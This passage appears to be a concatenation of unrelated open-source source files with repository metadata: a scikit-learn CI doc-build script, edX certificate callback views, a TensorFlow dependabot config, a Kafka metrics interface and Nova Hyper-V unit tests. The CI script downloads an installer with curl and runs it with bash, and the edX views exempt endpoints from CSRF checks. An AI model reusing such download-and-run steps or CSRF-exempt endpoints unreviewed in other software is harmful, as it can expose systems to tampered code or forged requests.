MINIFORGE_URL="https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-Linux-x86_64.sh"
curl -L --retry 10 $MINIFORGE_URL -o miniconda.sh
MINIFORGE_PATH=$HOME/miniforge3
bash ./miniconda.sh -b -p $MINIFORGE_PATH
source $MINIFORGE_PATH/etc/profile.d/conda.sh
conda activate
create_conda_environment_from_lock_file $CONDA_ENV_NAME $LOCK_FILE
conda activate $CONDA_ENV_NAME
# Sets up ccache when using system compiler
export PATH="/usr/lib/ccache:$PATH"
# Sets up ccache when using conda-forge compilers (needs to be after conda
# activate which sets CC and CXX)
export CC="ccache $CC"
export CXX="ccache $CXX"
ccache -M 512M
export CCACHE_COMPRESS=1
# Zeroing statistics so that ccache statistics are shown only for this build
ccache -z
show_installed_libraries
# Specify explicitly ninja -j argument because ninja does not handle cgroups v2 and
# use the same default rule as ninja (-j3 since we have 2 cores on CircleCI), see
# https://github.com/scikit-learn/scikit-learn/pull/30333
pip install -e . --no-build-isolation --config-settings=compile-args="-j 3"
echo "ccache build summary:"
ccache -s
export OMP_NUM_THREADS=1
if [[ "$CIRCLE_BRANCH" == "main" || "$CI_TARGET_BRANCH" == "main" ]]
then
towncrier build --yes
fi
if [[ "$CIRCLE_BRANCH" =~ ^main$ && -z "$CI_PULL_REQUEST" ]]
then
# List available documentation versions if on main
python build_tools/circle/list_versions.py --json doc/js/versions.json --rst doc/versions.rst
fi
# The pipefail is requested to propagate exit code
set -o pipefail && cd doc && make $make_args 2>&1 | tee ~/log.txt
cd -
set +o pipefail
affected_doc_paths() {
scikit_learn_version=$(python -c 'import re; import sklearn; print(re.sub(r"(\d+\.\d+).+", r"\1", sklearn.__version__))')
files=$(git diff --name-only origin/main...$CIRCLE_SHA1)
# use sed to replace files ending by .rst or .rst.template by .html
echo "$files" | grep -vP 'upcoming_changes/.*/\d+.*\.rst' | grep ^doc/.*\.rst | \
sed 's/^doc\/\(.*\)\.rst$/\1.html/; s/^doc\/\(.*\)\.rst\.template$/\1.html/'
# replace towncrier fragment files by link to changelog. uniq is used
# because in some edge cases multiple fragments can be added and we want a
# single link to the changelog.
echo "$files" | grep -P 'upcoming_changes/.*/\d+.*\.rst' | sed "s@.*@whats_new/v${scikit_learn_version}.html@" | uniq
echo "$files" | grep ^examples/.*.py | sed 's/^\(.*\)\.py$/auto_\1.html/'
sklearn_files=$(echo "$files" | grep '^sklearn/')
if [ -n "$sklearn_files" ]
then
grep -hlR -f<(echo "$sklearn_files" | sed 's/^/scikit-learn\/blob\/[a-z0-9]*\//') doc/_build/html/stable/modules/generated | cut -d/ -f5-
fi
}
affected_doc_warnings() {
files=$(git diff --name-only origin/main...$CIRCLE_SHA1)
# Look for sphinx warnings only in files affected by the PR
if [ -n "$files" ]
then
for af in ${files[@]}
do
warn+=`grep WARNING ~/log.txt | grep $af`
done
fi
echo "$warn"
}
if [ -n "$CI_PULL_REQUEST" ]
then
echo "The following documentation warnings may have been generated by PR #$CI_PULL_REQUEST:"
warnings=$(affected_doc_warnings)
if [ -z "$warnings" ]
then
warnings="/home/circleci/project/ no warnings"
fi
echo "$warnings"
echo "The following documentation files may have been changed by PR #$CI_PULL_REQUEST:"
affected=$(affected_doc_paths)
echo "$affected"
(
echo '<html><body><ul>'
echo "$affected" | sed 's|.*|<li><a href="&">&</a> [<a href="https://scikit-learn.org/dev/&">dev</a>, <a href="https://scikit-learn.org/stable/&">stable</a>]</li>|'
echo '</ul><p>General: <a href="index.html">Home</a> | <a href="api/index.html">API Reference</a> | <a href="auto_examples/index.html">Examples</a></p>'
echo '<strong>Sphinx Warnings in affected files</strong><ul>'
echo "$warnings" | sed 's/\/home\/circleci\/project\//<li>/g'
echo '</ul></body></html>'
) > 'doc/_build/html/stable/_changed.html'
if [ "$warnings" != "/home/circleci/project/ no warnings" ]
then
echo "Sphinx generated warnings when building the documentation related to files modified in this PR."
echo "Please check doc/_build/html/stable/_changed.html"
exit 1
fi
fi
|
unknown
|
github
|
https://github.com/scikit-learn/scikit-learn
|
build_tools/circle/build_doc.sh
|
"""
Views used by XQueue certificate generation.
"""
import json
import logging
from django.contrib.auth.models import User
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseForbidden
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from opaque_keys.edx.keys import CourseKey
from capa.xqueue_interface import XQUEUE_METRIC_NAME
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import (
CertificateStatuses,
ExampleCertificate,
GeneratedCertificate,
certificate_status_for_student
)
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.json_request import JsonResponse, JsonResponseBadRequest
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@csrf_exempt
def request_certificate(request):
"""Request the on-demand creation of a certificate for some user, course.
A request doesn't imply a guarantee that such a creation will take place.
We intentionally use the same machinery as is used for doing certification
at the end of a course run, so that we can be sure users get graded and
then if and only if they pass, do they get a certificate issued.
"""
if request.method == "POST":
if request.user.is_authenticated:
username = request.user.username
student = User.objects.get(username=username)
course_key = CourseKey.from_string(request.POST.get('course_id'))
course = modulestore().get_course(course_key, depth=2)
status = certificate_status_for_student(student, course_key)['status']
if status in [CertificateStatuses.unavailable, CertificateStatuses.notpassing, CertificateStatuses.error]:
log_msg = u'Grading and certification requested for user %s in course %s via /request_certificate call'
log.info(log_msg, username, course_key)
status = generate_user_certificates(student, course_key, course=course)
return HttpResponse(json.dumps({'add_status': status}), content_type='application/json')
return HttpResponse(json.dumps({'add_status': 'ERRORANONYMOUSUSER'}), content_type='application/json')
@csrf_exempt
def update_certificate(request):
"""
Will update GeneratedCertificate for a new certificate or
modify an existing certificate entry.
See models.py for a state diagram of certificate states
This view should only ever be accessed by the xqueue server
"""
status = CertificateStatuses
if request.method == "POST":
xqueue_body = json.loads(request.POST.get('xqueue_body'))
xqueue_header = json.loads(request.POST.get('xqueue_header'))
try:
course_key = CourseKey.from_string(xqueue_body['course_id'])
cert = GeneratedCertificate.eligible_certificates.get(
user__username=xqueue_body['username'],
course_id=course_key,
key=xqueue_header['lms_key'])
except GeneratedCertificate.DoesNotExist:
log.critical(
'Unable to lookup certificate\n'
'xqueue_body: %s\n'
'xqueue_header: %s',
xqueue_body,
xqueue_header
)
return HttpResponse(json.dumps({
'return_code': 1,
'content': 'unable to lookup key'
}), content_type='application/json')
if 'error' in xqueue_body:
cert.status = status.error
if 'error_reason' in xqueue_body:
# Hopefully we will record a meaningful error
# here if something bad happened during the
# certificate generation process
#
# example:
# (aamorm BerkeleyX/CS169.1x/2012_Fall)
# <class 'simples3.bucket.S3Error'>:
# HTTP error (reason=error(32, 'Broken pipe'), filename=None) :
# certificate_agent.py:175
cert.error_reason = xqueue_body['error_reason']
else:
if cert.status == status.generating:
cert.download_uuid = xqueue_body['download_uuid']
cert.verify_uuid = xqueue_body['verify_uuid']
cert.download_url = xqueue_body['url']
cert.status = status.downloadable
elif cert.status in [status.deleting]:
cert.status = status.deleted
else:
log.critical(
'Invalid state for cert update: %s', cert.status
)
return HttpResponse(
json.dumps({
'return_code': 1,
'content': 'invalid cert status'
}),
content_type='application/json'
)
cert.save()
return HttpResponse(json.dumps({'return_code': 0}),
content_type='application/json')
@csrf_exempt
@require_POST
def update_example_certificate(request):
"""Callback from the XQueue that updates example certificates.
Example certificates are used to verify that certificate
generation is configured correctly for a course.
Unlike other certificates, example certificates
are not associated with a particular user or displayed
to students.
For this reason, we need a different end-point to update
the status of generated example certificates.
Arguments:
request (HttpRequest)
Returns:
HttpResponse (200): Status was updated successfully.
HttpResponse (400): Invalid parameters.
HttpResponse (403): Rate limit exceeded for bad requests.
HttpResponse (404): Invalid certificate identifier or access key.
"""
log.info(u"Received response for example certificate from XQueue.")
rate_limiter = BadRequestRateLimiter()
# Check the parameters and rate limits
# If these are invalid, return an error response.
if rate_limiter.is_rate_limit_exceeded(request):
log.info(u"Bad request rate limit exceeded for update example certificate end-point.")
return HttpResponseForbidden("Rate limit exceeded")
if 'xqueue_body' not in request.POST:
log.info(u"Missing parameter 'xqueue_body' for update example certificate end-point")
rate_limiter.tick_bad_request_counter(request)
return JsonResponseBadRequest("Parameter 'xqueue_body' is required.")
if 'xqueue_header' not in request.POST:
log.info(u"Missing parameter 'xqueue_header' for update example certificate end-point")
rate_limiter.tick_bad_request_counter(request)
return JsonResponseBadRequest("Parameter 'xqueue_header' is required.")
try:
xqueue_body = json.loads(request.POST['xqueue_body'])
xqueue_header = json.loads(request.POST['xqueue_header'])
except (ValueError, TypeError):
log.info(u"Could not decode params to example certificate end-point as JSON.")
rate_limiter.tick_bad_request_counter(request)
return JsonResponseBadRequest("Parameters must be JSON-serialized.")
# Attempt to retrieve the example certificate record
# so we can update the status.
try:
uuid = xqueue_body.get('username')
access_key = xqueue_header.get('lms_key')
cert = ExampleCertificate.objects.get(uuid=uuid, access_key=access_key)
except ExampleCertificate.DoesNotExist:
# If we are unable to retrieve the record, it means the uuid or access key
# were not valid. This most likely means that the request is NOT coming
# from the XQueue. Return a 404 and increase the bad request counter
# to protect against a DDOS attack.
log.info(u"Could not find example certificate with uuid '%s' and access key '%s'", uuid, access_key)
rate_limiter.tick_bad_request_counter(request)
raise Http404
if 'error' in xqueue_body:
# If an error occurs, save the error message so we can fix the issue.
error_reason = xqueue_body.get('error_reason')
cert.update_status(ExampleCertificate.STATUS_ERROR, error_reason=error_reason)
log.warning(
(
u"Error occurred during example certificate generation for uuid '%s'. "
u"The error response was '%s'."
), uuid, error_reason
)
else:
# If the certificate generated successfully, save the download URL
# so we can display the example certificate.
download_url = xqueue_body.get('url')
if download_url is None:
rate_limiter.tick_bad_request_counter(request)
log.warning(u"No download URL provided for example certificate with uuid '%s'.", uuid)
return JsonResponseBadRequest(
"Parameter 'download_url' is required for successfully generated certificates."
)
else:
cert.update_status(ExampleCertificate.STATUS_SUCCESS, download_url=download_url)
log.info("Successfully updated example certificate with uuid '%s'.", uuid)
# Let the XQueue know that we handled the response
return JsonResponse({'return_code': 0})
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2024 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
version: 2
updates:
- package-ecosystem: github-actions
directory: /
schedule:
interval: monthly
groups:
github-actions:
patterns:
- "*"
- package-ecosystem: docker
directory: /ci/devinfra/docker_windows
schedule:
interval: monthly
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-major", "version-update:semver-minor"]
- package-ecosystem: docker
directory: /tensorflow/tools/gcs_test
schedule:
interval: monthly
- package-ecosystem: docker
directory: /tensorflow/tools/tf_sig_build_dockerfiles
schedule:
interval: monthly
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-major", "version-update:semver-minor"]
|
unknown
|
github
|
https://github.com/tensorflow/tensorflow
|
.github/dependabot.yml
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.common.metrics;
/**
* A measurable quantity that can be registered as a metric
*/
public interface Measurable extends MetricValueProvider<Double> {
/**
* Measure this quantity and return the result as a double.
*
* @param config The configuration for this metric
* @param now The POSIX time in milliseconds the measurement is being taken
* @return The measured value
*/
double measure(MetricConfig config, long now);
/**
* Measure this quantity and return the result as a double.
*
* This default implementation delegates to {@link #measure(MetricConfig, long)}.
*
* @param config The configuration for this metric
* @param now The POSIX time in milliseconds the measurement is being taken
* @return The measured value as a {@link Double}
*/
@Override
default Double value(MetricConfig config, long now) {
return measure(config, now);
}
}
|
java
|
github
|
https://github.com/apache/kafka
|
clients/src/main/java/org/apache/kafka/common/metrics/Measurable.java
|
# Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from six.moves import range
from nova import exception
from nova import test
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
class VMUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V VMUtils class."""
_FAKE_VM_NAME = 'fake_vm'
_FAKE_MEMORY_MB = 2
_FAKE_VCPUS_NUM = 4
_FAKE_JOB_PATH = 'fake_job_path'
_FAKE_RET_VAL = 0
_FAKE_RET_VAL_BAD = -1
_FAKE_PATH = "fake_path"
_FAKE_CTRL_PATH = 'fake_ctrl_path'
_FAKE_CTRL_ADDR = 0
_FAKE_DRIVE_ADDR = 0
_FAKE_MOUNTED_DISK_PATH = 'fake_mounted_disk_path'
_FAKE_VM_PATH = "fake_vm_path"
_FAKE_VHD_PATH = "fake_vhd_path"
_FAKE_DVD_PATH = "fake_dvd_path"
_FAKE_VOLUME_DRIVE_PATH = "fake_volume_drive_path"
_FAKE_VM_UUID = "04e79212-39bc-4065-933c-50f6d48a57f6"
_FAKE_INSTANCE = {"name": _FAKE_VM_NAME,
"uuid": _FAKE_VM_UUID}
_FAKE_SNAPSHOT_PATH = "fake_snapshot_path"
_FAKE_RES_DATA = "fake_res_data"
_FAKE_HOST_RESOURCE = "fake_host_resource"
_FAKE_CLASS = "FakeClass"
_FAKE_RES_PATH = "fake_res_path"
_FAKE_RES_NAME = 'fake_res_name'
_FAKE_ADDRESS = "fake_address"
_FAKE_JOB_STATUS_DONE = 7
_FAKE_JOB_STATUS_BAD = -1
_FAKE_JOB_DESCRIPTION = "fake_job_description"
_FAKE_ERROR = "fake_error"
_FAKE_ELAPSED_TIME = 0
_CONCRETE_JOB = "Msvm_ConcreteJob"
_FAKE_DYNAMIC_MEMORY_RATIO = 1.0
_FAKE_SUMMARY_INFO = {'NumberOfProcessors': 4,
'EnabledState': 2,
'MemoryUsage': 2,
'UpTime': 1}
_DEFINE_SYSTEM = 'DefineVirtualSystem'
_DESTROY_SYSTEM = 'DestroyVirtualSystem'
_DESTROY_SNAPSHOT = 'RemoveVirtualSystemSnapshot'
_ADD_RESOURCE = 'AddVirtualSystemResources'
_REMOVE_RESOURCE = 'RemoveVirtualSystemResources'
_SETTING_TYPE = 'SettingType'
_VM_GEN = constants.VM_GEN_1
_VIRTUAL_SYSTEM_TYPE_REALIZED = 3
def setUp(self):
self._vmutils = vmutils.VMUtils()
self._vmutils._conn = mock.MagicMock()
super(VMUtilsTestCase, self).setUp()
def test_enable_vm_metrics_collection(self):
self.assertRaises(NotImplementedError,
self._vmutils.enable_vm_metrics_collection,
self._FAKE_VM_NAME)
def test_get_vm_summary_info(self):
self._lookup_vm()
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
mock_summary = mock.MagicMock()
mock_svc.GetSummaryInformation.return_value = (self._FAKE_RET_VAL,
[mock_summary])
for (key, val) in self._FAKE_SUMMARY_INFO.items():
setattr(mock_summary, key, val)
summary = self._vmutils.get_vm_summary_info(self._FAKE_VM_NAME)
self.assertEqual(self._FAKE_SUMMARY_INFO, summary)
def _lookup_vm(self):
mock_vm = mock.MagicMock()
self._vmutils._lookup_vm_check = mock.MagicMock(
return_value=mock_vm)
mock_vm.path_.return_value = self._FAKE_VM_PATH
return mock_vm
def test_lookup_vm_ok(self):
mock_vm = mock.MagicMock()
self._vmutils._conn.Msvm_ComputerSystem.return_value = [mock_vm]
vm = self._vmutils._lookup_vm_check(self._FAKE_VM_NAME)
self.assertEqual(mock_vm, vm)
def test_lookup_vm_multiple(self):
mockvm = mock.MagicMock()
self._vmutils._conn.Msvm_ComputerSystem.return_value = [mockvm, mockvm]
self.assertRaises(vmutils.HyperVException,
self._vmutils._lookup_vm_check,
self._FAKE_VM_NAME)
def test_lookup_vm_none(self):
self._vmutils._conn.Msvm_ComputerSystem.return_value = []
self.assertRaises(exception.NotFound,
self._vmutils._lookup_vm_check,
self._FAKE_VM_NAME)
def test_set_vm_memory_static(self):
self._test_set_vm_memory_dynamic(1.0)
def test_set_vm_memory_dynamic(self):
self._test_set_vm_memory_dynamic(2.0)
def _test_set_vm_memory_dynamic(self, dynamic_memory_ratio):
mock_vm = self._lookup_vm()
mock_s = self._vmutils._conn.Msvm_VirtualSystemSettingData()[0]
mock_s.SystemType = 3
mock_vmsetting = mock.MagicMock()
mock_vmsetting.associators.return_value = [mock_s]
self._vmutils._modify_virt_resource = mock.MagicMock()
self._vmutils._set_vm_memory(mock_vm, mock_vmsetting,
self._FAKE_MEMORY_MB,
dynamic_memory_ratio)
self._vmutils._modify_virt_resource.assert_called_with(
mock_s, self._FAKE_VM_PATH)
if dynamic_memory_ratio > 1:
self.assertTrue(mock_s.DynamicMemoryEnabled)
else:
self.assertFalse(mock_s.DynamicMemoryEnabled)
def test_soft_shutdown_vm(self):
mock_vm = self._lookup_vm()
mock_shutdown = mock.MagicMock()
mock_shutdown.InitiateShutdown.return_value = (self._FAKE_RET_VAL, )
mock_vm.associators.return_value = [mock_shutdown]
with mock.patch.object(self._vmutils, 'check_ret_val') as mock_check:
self._vmutils.soft_shutdown_vm(self._FAKE_VM_NAME)
mock_shutdown.InitiateShutdown.assert_called_once_with(
Force=False, Reason=mock.ANY)
mock_check.assert_called_once_with(self._FAKE_RET_VAL, None)
def test_soft_shutdown_vm_no_component(self):
mock_vm = self._lookup_vm()
mock_vm.associators.return_value = []
with mock.patch.object(self._vmutils, 'check_ret_val') as mock_check:
self._vmutils.soft_shutdown_vm(self._FAKE_VM_NAME)
self.assertFalse(mock_check.called)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_vm_disks')
def test_get_vm_storage_paths(self, mock_get_vm_disks):
self._lookup_vm()
mock_rasds = self._create_mock_disks()
mock_get_vm_disks.return_value = ([mock_rasds[0]], [mock_rasds[1]])
storage = self._vmutils.get_vm_storage_paths(self._FAKE_VM_NAME)
(disk_files, volume_drives) = storage
self.assertEqual([self._FAKE_VHD_PATH], disk_files)
self.assertEqual([self._FAKE_VOLUME_DRIVE_PATH], volume_drives)
def test_get_vm_disks(self):
mock_vm = self._lookup_vm()
mock_vmsettings = [mock.MagicMock()]
mock_vm.associators.return_value = mock_vmsettings
mock_rasds = self._create_mock_disks()
mock_vmsettings[0].associators.return_value = mock_rasds
(disks, volumes) = self._vmutils._get_vm_disks(mock_vm)
mock_vm.associators.assert_called_with(
wmi_result_class=self._vmutils._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
mock_vmsettings[0].associators.assert_called_with(
wmi_result_class=self._vmutils._RESOURCE_ALLOC_SETTING_DATA_CLASS)
self.assertEqual([mock_rasds[0]], disks)
self.assertEqual([mock_rasds[1]], volumes)
def _create_mock_disks(self):
mock_rasd1 = mock.MagicMock()
mock_rasd1.ResourceSubType = self._vmutils._HARD_DISK_RES_SUB_TYPE
mock_rasd1.HostResource = [self._FAKE_VHD_PATH]
mock_rasd1.Connection = [self._FAKE_VHD_PATH]
mock_rasd1.Parent = self._FAKE_CTRL_PATH
mock_rasd1.Address = self._FAKE_ADDRESS
mock_rasd1.HostResource = [self._FAKE_VHD_PATH]
mock_rasd2 = mock.MagicMock()
mock_rasd2.ResourceSubType = self._vmutils._PHYS_DISK_RES_SUB_TYPE
mock_rasd2.HostResource = [self._FAKE_VOLUME_DRIVE_PATH]
return [mock_rasd1, mock_rasd2]
@mock.patch.object(vmutils.VMUtils, '_set_vm_vcpus')
@mock.patch.object(vmutils.VMUtils, '_set_vm_memory')
@mock.patch.object(vmutils.VMUtils, '_get_wmi_obj')
def test_create_vm(self, mock_get_wmi_obj, mock_set_mem, mock_set_vcpus):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._DEFINE_SYSTEM).return_value = (
None, self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
mock_vm = mock_get_wmi_obj.return_value
self._vmutils._conn.Msvm_ComputerSystem.return_value = [mock_vm]
mock_s = mock.MagicMock()
setattr(mock_s,
self._SETTING_TYPE,
self._VIRTUAL_SYSTEM_TYPE_REALIZED)
mock_vm.associators.return_value = [mock_s]
self._vmutils.create_vm(self._FAKE_VM_NAME, self._FAKE_MEMORY_MB,
self._FAKE_VCPUS_NUM, False,
self._FAKE_DYNAMIC_MEMORY_RATIO,
self._VM_GEN,
mock.sentinel.instance_path)
self.assertTrue(getattr(mock_svc, self._DEFINE_SYSTEM).called)
mock_set_mem.assert_called_with(mock_vm, mock_s, self._FAKE_MEMORY_MB,
self._FAKE_DYNAMIC_MEMORY_RATIO)
mock_set_vcpus.assert_called_with(mock_vm, mock_s,
self._FAKE_VCPUS_NUM,
False)
def test_get_vm_scsi_controller(self):
self._prepare_get_vm_controller(self._vmutils._SCSI_CTRL_RES_SUB_TYPE)
path = self._vmutils.get_vm_scsi_controller(self._FAKE_VM_NAME)
self.assertEqual(self._FAKE_RES_PATH, path)
@mock.patch("nova.virt.hyperv.vmutils.VMUtils.get_attached_disks")
def test_get_free_controller_slot(self, mock_get_attached_disks):
with mock.patch.object(self._vmutils,
'_get_disk_resource_address') as mock_get_addr:
mock_get_addr.return_value = 3
mock_get_attached_disks.return_value = [mock.sentinel.disk]
response = self._vmutils.get_free_controller_slot(
self._FAKE_CTRL_PATH)
mock_get_attached_disks.assert_called_once_with(
self._FAKE_CTRL_PATH)
self.assertEqual(response, 0)
def test_get_free_controller_slot_exception(self):
mock_get_address = mock.Mock()
mock_get_address.side_effect = range(
constants.SCSI_CONTROLLER_SLOTS_NUMBER)
mock_get_attached_disks = mock.Mock()
mock_get_attached_disks.return_value = (
[mock.sentinel.drive] * constants.SCSI_CONTROLLER_SLOTS_NUMBER)
with mock.patch.multiple(self._vmutils,
get_attached_disks=mock_get_attached_disks,
_get_disk_resource_address=mock_get_address):
self.assertRaises(vmutils.HyperVException,
self._vmutils.get_free_controller_slot,
mock.sentinel.scsi_controller_path)
def test_get_vm_ide_controller(self):
self._prepare_get_vm_controller(self._vmutils._IDE_CTRL_RES_SUB_TYPE)
path = self._vmutils.get_vm_ide_controller(self._FAKE_VM_NAME,
self._FAKE_ADDRESS)
self.assertEqual(self._FAKE_RES_PATH, path)
def test_get_vm_ide_controller_none(self):
self._prepare_get_vm_controller(self._vmutils._IDE_CTRL_RES_SUB_TYPE)
path = self._vmutils.get_vm_ide_controller(
mock.sentinel.FAKE_VM_NAME, mock.sentinel.FAKE_NOT_FOUND_ADDR)
self.assertNotEqual(self._FAKE_RES_PATH, path)
def _prepare_get_vm_controller(self, resource_sub_type):
mock_vm = self._lookup_vm()
mock_vm_settings = mock.MagicMock()
mock_rasds = mock.MagicMock()
mock_rasds.path_.return_value = self._FAKE_RES_PATH
mock_rasds.ResourceSubType = resource_sub_type
mock_rasds.Address = self._FAKE_ADDRESS
mock_vm_settings.associators.return_value = [mock_rasds]
mock_vm.associators.return_value = [mock_vm_settings]
def _prepare_resources(self, mock_path, mock_subtype, mock_vm_settings):
mock_rasds = mock_vm_settings.associators.return_value[0]
mock_rasds.path_.return_value = mock_path
mock_rasds.ResourceSubType = mock_subtype
return mock_rasds
@mock.patch("nova.virt.hyperv.vmutils.VMUtils.get_free_controller_slot")
@mock.patch("nova.virt.hyperv.vmutils.VMUtils._get_vm_scsi_controller")
def test_attach_scsi_drive(self, mock_get_vm_scsi_controller,
mock_get_free_controller_slot):
mock_vm = self._lookup_vm()
mock_get_vm_scsi_controller.return_value = self._FAKE_CTRL_PATH
mock_get_free_controller_slot.return_value = self._FAKE_DRIVE_ADDR
with mock.patch.object(self._vmutils,
'attach_drive') as mock_attach_drive:
self._vmutils.attach_scsi_drive(mock_vm, self._FAKE_PATH,
constants.DISK)
mock_get_vm_scsi_controller.assert_called_once_with(mock_vm)
mock_get_free_controller_slot.assert_called_once_with(
self._FAKE_CTRL_PATH)
mock_attach_drive.assert_called_once_with(
mock_vm, self._FAKE_PATH, self._FAKE_CTRL_PATH,
self._FAKE_DRIVE_ADDR, constants.DISK)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
@mock.patch.object(vmutils.VMUtils, '_get_vm_ide_controller')
def test_attach_ide_drive(self, mock_get_ide_ctrl, mock_get_new_rsd):
mock_vm = self._lookup_vm()
mock_rsd = mock_get_new_rsd.return_value
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.attach_ide_drive(self._FAKE_VM_NAME,
self._FAKE_CTRL_PATH,
self._FAKE_CTRL_ADDR,
self._FAKE_DRIVE_ADDR)
mock_add_virt_res.assert_called_with(mock_rsd,
mock_vm.path_.return_value)
mock_get_ide_ctrl.assert_called_with(mock_vm, self._FAKE_CTRL_ADDR)
self.assertTrue(mock_get_new_rsd.called)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
def test_create_scsi_controller(self, mock_get_new_rsd):
mock_vm = self._lookup_vm()
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.create_scsi_controller(self._FAKE_VM_NAME)
mock_add_virt_res.assert_called_with(mock_get_new_rsd.return_value,
mock_vm.path_.return_value)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
def test_attach_volume_to_controller(self, mock_get_new_rsd):
mock_vm = self._lookup_vm()
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.attach_volume_to_controller(
self._FAKE_VM_NAME, self._FAKE_CTRL_PATH, self._FAKE_CTRL_ADDR,
self._FAKE_MOUNTED_DISK_PATH)
mock_add_virt_res.assert_called_with(mock_get_new_rsd.return_value,
mock_vm.path_.return_value)
@mock.patch.object(vmutils.VMUtils, '_modify_virt_resource')
@mock.patch.object(vmutils.VMUtils, '_get_nic_data_by_name')
def test_set_nic_connection(self, mock_get_nic_conn, mock_modify_virt_res):
self._lookup_vm()
mock_nic = mock_get_nic_conn.return_value
self._vmutils.set_nic_connection(self._FAKE_VM_NAME, None, None)
mock_modify_virt_res.assert_called_with(mock_nic, self._FAKE_VM_PATH)
@mock.patch.object(vmutils.VMUtils, '_get_new_setting_data')
def test_create_nic(self, mock_get_new_virt_res):
self._lookup_vm()
mock_nic = mock_get_new_virt_res.return_value
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.create_nic(
self._FAKE_VM_NAME, self._FAKE_RES_NAME, self._FAKE_ADDRESS)
mock_add_virt_res.assert_called_with(mock_nic, self._FAKE_VM_PATH)
def test_set_vm_state(self):
mock_vm = self._lookup_vm()
mock_vm.RequestStateChange.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.set_vm_state(self._FAKE_VM_NAME,
constants.HYPERV_VM_STATE_ENABLED)
mock_vm.RequestStateChange.assert_called_with(
constants.HYPERV_VM_STATE_ENABLED)
def test_destroy_vm(self):
self._lookup_vm()
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._DESTROY_SYSTEM).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.destroy_vm(self._FAKE_VM_NAME)
getattr(mock_svc, self._DESTROY_SYSTEM).assert_called_with(
self._FAKE_VM_PATH)
@mock.patch.object(vmutils.VMUtils, '_wait_for_job')
def test_check_ret_val_ok(self, mock_wait_for_job):
self._vmutils.check_ret_val(constants.WMI_JOB_STATUS_STARTED,
self._FAKE_JOB_PATH)
mock_wait_for_job.assert_called_once_with(self._FAKE_JOB_PATH)
def test_check_ret_val_exception(self):
self.assertRaises(vmutils.HyperVException,
self._vmutils.check_ret_val,
self._FAKE_RET_VAL_BAD,
self._FAKE_JOB_PATH)
def test_wait_for_job_done(self):
mockjob = self._prepare_wait_for_job(constants.WMI_JOB_STATE_COMPLETED)
job = self._vmutils._wait_for_job(self._FAKE_JOB_PATH)
self.assertEqual(mockjob, job)
def test_wait_for_job_exception_concrete_job(self):
mock_job = self._prepare_wait_for_job()
mock_job.path.return_value.Class = self._CONCRETE_JOB
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def test_wait_for_job_exception_with_error(self):
mock_job = self._prepare_wait_for_job()
mock_job.GetError.return_value = (self._FAKE_ERROR, self._FAKE_RET_VAL)
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def test_wait_for_job_exception_no_error(self):
mock_job = self._prepare_wait_for_job()
mock_job.GetError.return_value = (None, None)
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def _prepare_wait_for_job(self, state=_FAKE_JOB_STATUS_BAD):
mock_job = mock.MagicMock()
mock_job.JobState = state
mock_job.Description = self._FAKE_JOB_DESCRIPTION
mock_job.ElapsedTime = self._FAKE_ELAPSED_TIME
